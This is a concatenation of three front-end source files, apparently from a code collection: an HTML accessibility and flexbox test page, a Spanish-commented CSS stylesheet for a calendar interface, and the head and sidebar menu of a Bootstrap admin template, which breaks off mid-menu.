<!-- source for script https://developer.mozilla.org/en-US/docs/Web/Guide/HTML/Sections_and_Outlines_of_an_HTML5_document -->
<!--[if lt IE 9]>
<script>
document.createElement("header" );
document.createElement("footer" );
document.createElement("section");
document.createElement("aside" );
document.createElement("nav" );
document.createElement("article");
document.createElement("hgroup" );
document.createElement("time" );
</script>
<noscript>
<strong>Warning !</strong>
Because your browser does not support HTML5, some elements are created using JavaScript.
Unfortunately your browser has disabled scripting. Please enable it in order to display this page.
</noscript>
<![endif]-->
<head>
<meta charset="utf-8" />
<TITLE>Test Test Test</TITLE>
<link rel="stylesheet" href="flex2.css" />
</head>
<body>
<div id="skip"><a href="#content">Skip to Main Content</a></div>
<HEADER>
<H1>Under Construction</H1>
</HEADER>
<article itemscope itemtype="http://schema.org/CreativeWork">
<header><h4>Very, very very much under construction...</h4></header>
<aside><h6>Now Using flex2.css</h6></aside>
<div style="background:url('https://cloud.githubusercontent.com/assets/4747981/8571311/f0056e8c-2553-11e5-860d-61ca63a5e4ff.jpg') no-repeat center center;height:500px;background-size:cover;"></div>
<h6>Background image by Ryan McGuire <a href="http://gratisography.com/">Gratisography</a></h6>
</article>
<aside>
<h4>Iframe containing display and links from Gitter a11y Slackers</h4>
<div class="iframe-region">
<iframe src="https://gitter.im/w3c/a11ySlackers/~chat#initial" style="display: block; width: 100%; height: 300px;" title="Iframe with a11y slackers" name="testiframe" id="testiframe" sandbox></iframe>
</div>
</aside>
<main id="content">
<section>
<h5>Links to information and tests</h5>
<ul class="flex flex-container">
<li class="flex-item-blue"><a href="https://gitter.im/w3c/a11ySlackers">Login to Gitter a11y Slackers</a></li>
<li class="flex-item-storm"><a href="http://tenon.io/">Tenon.io</a></li>
<li class="flex-item-blue"><a href="http://www.w3.org/TR/UNDERSTANDING-WCAG20/navigation-mechanisms-skip.html">WCAG 2.0 ByPassing Repetitive Blocks</a></li>
<li class="flex-item-blue"><a href="http://webaim.org/techniques/css/invisiblecontent/">WebAIM technique for skip link that comes into focus when tabbing</a></li>
<li class="flex-item-blue"><a href="https://github.com/w3c/a11ySlackers#user-content-pidgin">Join a11y Slacker</a></li>
<li class="flex-item-blue"><a href="http://www.paciellogroup.com/blog/2015/07/anybody-can-be-an-a11y-slacker/#sameroom">Article...Anybody can be an A11y Slacker</a></li>
<li class="flex-item-storm"><a href="http://www.w3.org/WAI/eval/report-tool/#/">WAI Eval Tool</a></li>
<li class="flex-item-storm"><a href="http://www.w3.org/WAI/ER/tools/">List of a11y test tools</a></li>
</ul>
<ul class="flex-container">
<li class="flex-item-bluegreen">Tab Order Needs to Skip Iframe</li>
<li class="flex-item-bluegreen">Test screen-reader readout of content before</li>
<li class="flex-item-bluegreen">Color Contrast Test Needed</li>
<li class="flex-item-bluegreen">Check link location change on focus</li>
<li class="flex-item-bluegreen">Check Bypass Blocks: Understanding SC 2.4.1</li>
<li class="flex-item-bluegreen">Check Outline Use of li rather than headers</li>
<li class="flex-item-bluegreen">Heading Structure</li>
<li class="flex-item-tan"><a href="http://webaim.org/techniques/css/invisiblecontent/">Invisible Content</a></li>
</ul>
</section>
</main>
<aside>
<ul class="flex-container">
<li class="flex-item-black"><a href="flexboxtests1.html">Flexbox Test One</a></li>
<li class="flex-item-black"><a href="http://bennettfeely.com/flexplorer/">http://bennettfeely.com/flexplorer/</a></li>
<li class="flex-item-black"><a href="https://scotch.io/demos/visual-guide-to-css3-flexbox-flexbox-playground">Visual Guide Flexbox</a></li>
</ul>
</aside>
<footer>
<figure>
<img src="https://cloud.githubusercontent.com/assets/4747981/9014179/b021ae14-378e-11e5-86ad-ed05d67b0001.gif" alt="example of links losing position after focus">
<figcaption>Screenshot showing that the location of the links jumps around and sticks after focus.</figcaption>
</figure>
<h6><a href="https://scotch.io/demos/visual-guide-to-css3-flexbox-flexbox-playground">Visual Guide Flexbox</a></h6>
</footer>
</body>
</html>
|
www/styles.css | cabrero/ejemplos-wui | /*
* Esta hoja de estilos comienza con la guía de indentidate corporativa de la udc.
*
* === Colores ===
*
* - Texto: #222222
* - Triada: #222222 #AEAEAE #6E6E6E #333333
* #BBBBBB
* - Logo: #D60D8C, pantone 233
* - Triada: #D60D8C, #89165F - #DDC323 - #1A9CA3, #018289/#015256
*
* === Tipografía ===
*
* - Familia: Arial, Helvetica o equivalente
* - Tamaño: no se especifica
*
*/
/*
* Por omisión asumimos un navegador con un ancho de hasta 360px
*/
/* Reset de propiedades */
* {
margin: 0;
padding: 0;
border: 0;
}
/* Valores por omision:
* - Ver guía de estilo
* - Tamaño de fuente: por defecto
*/
body {
font-family: Helvetica, Arial, sans-serif;
font-size: 100%;
color: #222222;
background-color: #FAFAFA;
width: 100%;
}
body > header {
width: 100%;
height: 96px; /* @TODO ¿ Cómo asegurarse que es 48dp ? */
overflow: hidden;
position: fixed;
top: 0;
left: 0;
background: rgba(1,82,86, 0.8);
}
body > header h1 {
margin: 12px;
color: #DDC323;
font-size: 140%;
text-align: center;
}
body > header h1 a {
display: inline-block;
text-decoration: none;
color: inherit;
padding: 12px 32px 12px 0;
background: url(down.png) no-repeat right bottom / 16px 16px border-box;
border: 0 solid #DDC323;
border-width: 0 1px 1px 0;
}
section#main, section#main-form, section#dialog {
margin-top: 96px;
margin-right: 12px;
}
/* Estilo del calendario */
table.calendar-weeks {
width: 100%;
border-collapse: collapse;
text-align: right;
margin-right: 24px; /* Espacio para la barra de scroll */
table-layout: fixed;
}
/* Estilo del caption = no mostrar en pantalla, pero conservar para la a11y */
table.calendar-weeks caption {
position: absolute; /* Fuck off yaws */
left: -999px;
width: 990px;
overflow: hidden;
}
/* Estilo de las cabeceras del calendario */
table.calendar-weeks th {
color: #015256;
font-weight: normal;
padding: 6px 0;
border-bottom: 2px solid #015256;
}
table.calendar-weeks th:first-child {
border: 0;
}
/* Estilo para las casillas del calendario */
table.calendar-weeks tbody tr {
font-size: 100%;
height: 3em;
}
table.calendar-weeks tbody td {
background-color: #FAFAFF;
border-bottom: 1px solid #018289;
border-right: 1px solid #018289;
vertical-align: top;
padding: 2px 4px;
}
table.calendar-weeks tbody td:first-child {
background-color: inherit;
border-bottom: 0;
color: #AEAEAE;
text-align: center;
font-style: italic;
font-size: 90%;
vertical-align: middle;
}
table.calendar-weeks td.today {
background-color: #DDC323;
font-weight: bold;
}
/* Estilo del contenido aside */
aside {
margin-top: 48px;
border: 0 solid #015256;
border-width: 0 1px 1px 1px;
box-shadow: 0px 1px 2px #015256;
font-size: 90%;
padding: 0 14px;
}
aside header h1 {
font-size: 110%;
color: #018289;
font-weight: bold;
}
aside ul {
list-style: none;
}
aside ul li {
overflow: hidden;
margin: 12px 0 0 0;
}
aside li p {
margin: 0;
height: 2em;
padding: 0 32px 0 10px;
text-overflow: ellipsis;
white-space: nowrap;
overflow: hidden;
line-height: 1;
}
aside li p:first-child {
color: #018289;
padding-left: 0;
}
aside li a {
color: #044144;
font-style: italic;
letter-spacing: 1px;
}
/* Estilo para el formulario */
section#dialog {
visibility: hidden;
position: fixed;
top: 0;
left: 0;
height: 0;
}
section#dialog, section#dialog form {
transition: all 0.7s ease-in 0s;
-webkit-transition: all 0.7s ease-in 0s;
}
section#dialog:target {
visibility: visible;
height: 100%;
}
section#dialog:target div#escape {
z-index: 100;
width: 100%;
height: 96px;
position: fixed;
top: 0;
left: 0;
}
section#dialog:target div#escape a {
display: block;
width: 100%;
height: 100%;
}
section#dialog form {
opacity: 0;
z-index: 200;
}
section#dialog:target form {
opacity: 1;
}
section.calendar-form {
width: 100%;
background-color: rgba(26,156,163, 0.96);
}
section.calendar-form form {
font-size: 120%;
}
section.calendar-form form p {
margin-bottom: 12px;
padding: 14px 4px;
font-weight: bold;
color: #DDC323;
}
section.calendar-form form p label {
display: block;
}
section.calendar-form form select {
margin-left: .6em;
background-color: transparent;
font-size: 100%;
font-weight: bold;
color: #D60D8C;
text-shadow: 1px 1px 1px rgba(214, 14, 134, 1);
}
section.calendar-form form input[type="submit"] {
padding: 12px 10px;
background-color: inherit;
text-align: center;
font-size: 120%;
font-weight: bold;
color: #89165F;
cursor: pointer;
}
section.calendar-form form :focus {
outline: none;
-moz-user-focus: none;
text-decoration: underline;
}
section.calendar-form form ::-moz-focus-inner {
border: 0;
}
/*
* Ponemos un breakpoint en 1000px
* A partir de ahí, el layout es en dos columnas, una para el calendario y otra para el aside.
*/
@media screen and (min-width: 1000px) {
section#main {
display: inline-block;
width: 73.24218750%;
}
aside {
display: inline-block;
width: 21.67968750%;
vertical-align: top;
margin-top: 103px;
}
body > header h1 {
font-size: 170%;
}
table.calendar-weeks tbody tr {
height: 5em;
}
}
@media screen and (min-width: 1440px) {
@font-face {
font-family: "ANUDAW";
src: url(ANUDI___.ttf) format("truetype");
}
body {
width: 90%;
margin: 0 auto;
}
body > header {
background-color: transparent;
}
body > header h1 {
width: 90%;
background-color: rgba(1,82,86, 0.8);
margin: 0 auto;
padding: 28px 0;
font-family: "ANUDAW";
font-size: 170%;
}
table.calendar-weeks tbody tr {
height: 8em;
}
}
/*
* Una regla más para el calendario.
*/
@media screen and (min-width: 700px) {
section.calendar-form form p {
text-align: center;
}
section.calendar-form form p label {
display: inline;
}
} |
themeforest-5194599-flat-kit-premium-bootstrap-3-app-template/html/admin/light-menus/fluid-layout/accordion-left-fixed-top-fixed/index.html | dlamprea/door_learning | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="ie lt-ie9 lt-ie8 lt-ie7 fluid top-full menuh-top sidebar sidebar-full sidebar-collapsible sidebar-width-mini sidebar-hat"> <![endif]-->
<!--[if IE 7]> <html class="ie lt-ie9 lt-ie8 fluid top-full menuh-top sidebar sidebar-full sidebar-collapsible sidebar-width-mini sidebar-hat"> <![endif]-->
<!--[if IE 8]> <html class="ie lt-ie9 fluid top-full menuh-top sidebar sidebar-full sidebar-collapsible sidebar-width-mini sidebar-hat"> <![endif]-->
<!--[if gt IE 8]> <html class="animations ie gt-ie8 fluid top-full menuh-top sidebar sidebar-full sidebar-collapsible sidebar-width-mini sidebar-hat"> <![endif]-->
<!--[if !IE]><!--><html class="animations fluid top-full menuh-top sidebar sidebar-full sidebar-collapsible sidebar-width-mini sidebar-hat"><!-- <![endif]-->
<head>
<title>FLAT KIT (v2.0.0)</title>
<!-- Meta -->
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimum-scale=1.0, maximum-scale=1.0">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7; IE=EDGE" />
<!-- Bootstrap -->
<link href="../../../../../common/bootstrap/css/bootstrap.css" rel="stylesheet" type="text/css" />
<link href="../../../../../common/bootstrap/css/responsive.css" rel="stylesheet" type="text/css" />
<!-- Glyphicons Font Icons -->
<link href="../../../../../common/theme/fonts/glyphicons/css/glyphicons_regular.css" rel="stylesheet" />
<link href="../../../../../common/theme/fonts/glyphicons/css/glyphicons_social.css" rel="stylesheet" />
<link href="../../../../../common/theme/fonts/glyphicons/css/glyphicons_filetypes.css" rel="stylesheet" />
<link rel="stylesheet" href="../../../../../common/theme/fonts/font-awesome/css/font-awesome.min.css">
<!--[if IE 7]><link rel="stylesheet" href="../../../../../common/theme/fonts/font-awesome/css/font-awesome-ie7.min.css"><![endif]-->
<!-- Uniform Pretty Checkboxes -->
<link href="../../../../../common/theme/scripts/plugins/forms/pixelmatrix-uniform/css/uniform.default.css" rel="stylesheet" />
<!-- PrettyPhoto -->
<link href="../../../../../common/theme/scripts/plugins/gallery/prettyphoto/css/prettyPhoto.css" rel="stylesheet" />
<!-- JQuery -->
<script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
<script src="http://code.jquery.com/jquery-migrate-1.2.1.min.js"></script>
<!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
<!--[if lt IE 9]>
<script src="../../../../../common/theme/scripts/plugins/system/html5shiv.js"></script>
<![endif]-->
<!--[if IE]><!--><script src="../../../../../common/theme/scripts/plugins/other/excanvas/excanvas.js"></script><!--<![endif]-->
<!--[if lt IE 8]><script src="../../../../../common/theme/scripts/plugins/other/json2.js"></script><![endif]-->
<!-- Bootstrap Extended -->
<link href="../../../../../common/bootstrap/extend/jasny-fileupload/css/fileupload.css" rel="stylesheet">
<link href="../../../../../common/bootstrap/extend/bootstrap-wysihtml5/css/bootstrap-wysihtml5-0.0.2.css" rel="stylesheet">
<link href="../../../../../common/bootstrap/extend/bootstrap-select/bootstrap-select.css" rel="stylesheet" />
<link href="../../../../../common/bootstrap/extend/bootstrap-switch/static/stylesheets/bootstrap-switch.css" rel="stylesheet" />
<!-- DateTimePicker Plugin -->
<link href="../../../../../common/theme/scripts/plugins/forms/bootstrap-datetimepicker/css/datetimepicker.css" rel="stylesheet" />
<!-- JQueryUI -->
<link href="../../../../../common/theme/scripts/plugins/system/jquery-ui/css/smoothness/jquery-ui-1.9.2.custom.min.css" rel="stylesheet" />
<!-- MiniColors ColorPicker Plugin -->
<link href="../../../../../common/theme/scripts/plugins/color/jquery-miniColors/jquery.miniColors.css" rel="stylesheet" />
<!-- Notyfy Notifications Plugin -->
<link href="../../../../../common/theme/scripts/plugins/notifications/notyfy/jquery.notyfy.css" rel="stylesheet" />
<link href="../../../../../common/theme/scripts/plugins/notifications/notyfy/themes/default.css" rel="stylesheet" />
<!-- Gritter Notifications Plugin -->
<link href="../../../../../common/theme/scripts/plugins/notifications/Gritter/css/jquery.gritter.css" rel="stylesheet" />
<!-- Easy-pie Plugin -->
<link href="../../../../../common/theme/scripts/plugins/charts/easy-pie/jquery.easy-pie-chart.css" rel="stylesheet" />
<!-- Google Code Prettify Plugin -->
<link href="../../../../../common/theme/scripts/plugins/other/google-code-prettify/prettify.css" rel="stylesheet" />
<!-- Select2 Plugin -->
<link href="../../../../../common/theme/scripts/plugins/forms/select2/select2.css" rel="stylesheet" />
<!-- Pageguide Guided Tour Plugin -->
<!--[if gt IE 8]><!--><link media="screen" href="../../../../../common/theme/scripts/plugins/other/pageguide/css/pageguide.css" rel="stylesheet" /><!--<![endif]-->
<!-- Bootstrap Image Gallery -->
<link href="../../../../../common/bootstrap/extend/bootstrap-image-gallery/css/bootstrap-image-gallery.min.css" rel="stylesheet" />
<!-- Main Theme Stylesheet :: CSS -->
<link href="../../../../../common/theme/css/style-default-menus-light.css?1382019475" rel="stylesheet" type="text/css" />
<!-- FireBug Lite -->
<!-- <script src="https://getfirebug.com/firebug-lite-debug.js"></script> -->
<!-- LESS.js Library -->
<script src="../../../../../common/theme/scripts/plugins/system/less.min.js"></script>
<!-- Global -->
<script>
//<![CDATA[
var basePath = '',
commonPath = '../../../../../common/';
// colors
var primaryColor = '#e5412d',
dangerColor = '#b55151',
successColor = '#609450',
warningColor = '#ab7a4b',
inverseColor = '#45484d';
var themerPrimaryColor = primaryColor;
//]]>
</script>
</head>
<body class="document-body ">
<!-- Main Container Fluid -->
<div class="container-fluid menu-hidden sidebar-hidden-phone fluid menu-left">
<!-- Sidebar menu & content wrapper -->
<div id="wrapper">
<!-- Sidebar Menu -->
<div id="menu" class="hidden-print">
<!-- Brand -->
<a href="index.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="appbrand"><span class="text-primary">FLAT</span> <span>KIT</span></a>
<!-- Scrollable menu wrapper with Maximum height -->
<div class="slim-scroll" data-scroll-height="800px">
<!-- Menu Toggle Button -->
<button type="button" class="btn btn-navbar">
<span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span>
</button>
<!-- // Menu Toggle Button END -->
<!-- Sidebar Profile -->
<span class="profile center">
<a href="my_account_advanced.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible"><img src="../../../../../common/theme/images/avatar-74x74.jpg" alt="Avatar" /></a>
</span>
<!-- // Sidebar Profile END -->
<!-- Menu -->
<ul>
<li class="active"><a href="index.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons dashboard"><i></i><span>Dashboard</span></a></li>
<li class="hasSubmenu">
<a href="#menu_components" data-toggle="collapse" class="glyphicons settings"><i></i><span>Components</span><span class="icon-chevron-down"></span></a>
<ul class="collapse" id="menu_components">
<!-- Components Submenu Level 2 -->
<li class="hasSubmenu">
<a href="#menu_components_forms" data-toggle="collapse">Forms<span class="badge badge-primary fix">4</span></a>
<ul class="collapse" id="menu_components_forms">
<li class=""><a href="form_wizards.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Form Wizards</a></li>
<li class=""><a href="form_elements.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Form Elements</a></li>
<li class=""><a href="form_validator.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Form Validator</a></li>
<li class=""><a href="file_managers.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">File Managers</a></li>
</ul>
</li>
<!-- // Components Submenu Level 2 END -->
<li class="hasSubmenu">
<a href="#menu_components_tables" data-toggle="collapse">Tables<span class="badge badge-primary fix">3</span></a>
<ul class="collapse" id="menu_components_tables">
<li class=""><a href="tables.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Tables</a></li>
<li class=""><a href="tables_responsive.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Responsive Tables</a></li>
<li class=""><a href="pricing_tables.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Pricing tables</a></li>
</ul>
</li>
<!-- Components Submenu Regular Items -->
<li class=""><a href="ui.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">UI Elements</a></li>
<li class=""><a href="icons.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Icons</a></li>
<li class=""><a href="widgets.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Widgets</a></li>
<li class=""><a href="tabs.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Tabs</a></li>
<li class=""><a href="sliders.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Sliders</a></li>
<li class=""><a href="charts.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Charts</a></li>
<li class=""><a href="grid.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Grid system</a></li>
<li class=""><a href="notifications.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Notifications</span></a></li>
<li class=""><a href="modals.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Modals</a></li>
<li class=""><a href="thumbnails.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Thumbnails</a></li>
<li class=""><a href="carousels.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Carousels</a></li>
<li class=""><a href="image_crop.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Image Cropping</a></li>
<li class=""><a href="tour.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Page Tour</a></li>
<li class="hasSubmenu">
<a href="#menu_components_api" data-toggle="collapse">APIs<span class="badge badge-primary fix">2</span></a>
<ul class="collapse" id="menu_components_api">
<li class=""><a href="twitter.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Twitter API</a></li>
<li class=""><a href="google_analytics.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Google Analytics API</a></li>
</ul>
</li>
<li class=""><a href="infinite_scroll.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Infinite Scroll</a></li>
<!-- // Components Submenu Regular Items END -->
</ul>
</li>
<li class="hasSubmenu">
<a href="#menu_pages" data-toggle="collapse" class="glyphicons notes"><i></i><span>Pages</span><span class="icon-chevron-down"></span></a>
<ul class="collapse" id="menu_pages">
<li><a href="timeline.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons history"><i></i>Timeline</a></li>
<li><a href="employees.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons group"><i></i>Employees</a></li>
<li class="hasSubmenu">
<a href="#menu_pages_front" data-toggle="collapse" class="glyphicons user"><i></i>Front<span class="badge badge-primary fix">15</span></a>
<ul class="collapse" id="menu_pages_front">
<li><a class="no-ajaxify" href="../front/index_slider.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Revolution Slider Fixed</a></li>
<li><a class="no-ajaxify" href="../front/index_slider_fullwidth.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Revolution Slider Wide</a></li>
<li><a class="no-ajaxify" href="../front/index.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Home page #1</a></li>
<li><a class="no-ajaxify" href="../front/index_2.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Home page #2</a></li>
<li><a class="no-ajaxify" href="../front/about.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">About us</a></li>
<li><a class="no-ajaxify" href="../front/pricing.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Pricing</a></li>
<li><a class="no-ajaxify" href="../front/blog.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Blog</a></li>
<li><a class="no-ajaxify" href="../front/blog_timeline.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Blog Timeline</a></li>
<li><a class="no-ajaxify" href="../front/shop.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Shop Catalog</a></li>
<li><a class="no-ajaxify" href="../front/shop_product.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Shop Product</a></li>
<li><a class="no-ajaxify" href="../front/shop_cart.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Shopping Cart</a></li>
<li><a class="no-ajaxify" href="../front/contact.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Contact</a></li>
<li><a class="no-ajaxify" href="../front/login.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Login</a></li>
<li><a class="no-ajaxify" href="../front/signup.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Sign up</a></li>
<li><a class="no-ajaxify" href="../front/error.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Error page</a></li>
</ul>
</li>
<li><a href="invoice.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons credit_card"><i></i>Invoice</a></li>
<li><a href="faq.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons circle_question_mark"><i></i>FAQ</a></li>
<li><a href="search.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons search"><i></i>Search</a></li>
<li><a href="ratings.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons star"><i></i>Ratings</a></li>
<li class="hasSubmenu">
<a href="#menu_pages_account" data-toggle="collapse" class="glyphicons user"><i></i>Account<span class="badge badge-primary fix">4</span></a>
<ul class="collapse" id="menu_pages_account">
<li class=""><a href="my_account_advanced.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Advanced profile</a></li>
<li class=""><a href="my_account.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">My Account</a></li>
<li><a href="login.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible"><i></i>Login</a></li>
<li><a href="signup.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible"><i></i>Register</a></li>
</ul>
</li>
<li class="hasSubmenu">
<a href="#menu_pages_maps" data-toggle="collapse" class="glyphicons google_maps"><i></i>Maps<span class="badge badge-primary fix">2</span></a>
<ul class="collapse" id="menu_pages_maps">
<li class=""><a href="maps_vector.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Vector maps</a></li>
<li class=""><a href="maps_google.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Google maps</a></li>
</ul>
</li>
<li class="hasSubmenu">
<a href="#menu_pages_shop" data-toggle="collapse" class="glyphicons shopping_cart"><i></i>Online Shop<span class="badge badge-primary fix">3</span></a>
<ul class="collapse" id="menu_pages_shop">
<li class=""><a href="shop_products.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Products</a></li>
<li class=""><a href="shop_edit_product.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Add product</a></li>
<li class=""><a href="shop_orders_timeline.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible">Orders Timeline</a></li>
</ul>
</li>
<li><a href="typography.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons font"><i></i>Typography</a></li>
<li><a href="gallery.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons picture"><i></i>Photo Gallery</a></li>
<li><a href="calendar.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons calendar"><i></i>Calendar</a></li>
<li><a href="bookings.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons user_add"><i></i>Bookings</a></li>
<li><a href="finances.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons coins"><i></i>Finances</a></li>
<li><a href="error.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons warning_sign"><i></i>Error page</a></li>
<li><a href="blank.html?lang=en&layout_type=fluid&menu_position=menu-left&style=style-default-menus-light&top-sticky=false&sidebar-sticky=false&sidebar_type=collapsible" class="glyphicons magic"><i></i>Blank page</a></li>
</ul>
</li>
</ul>
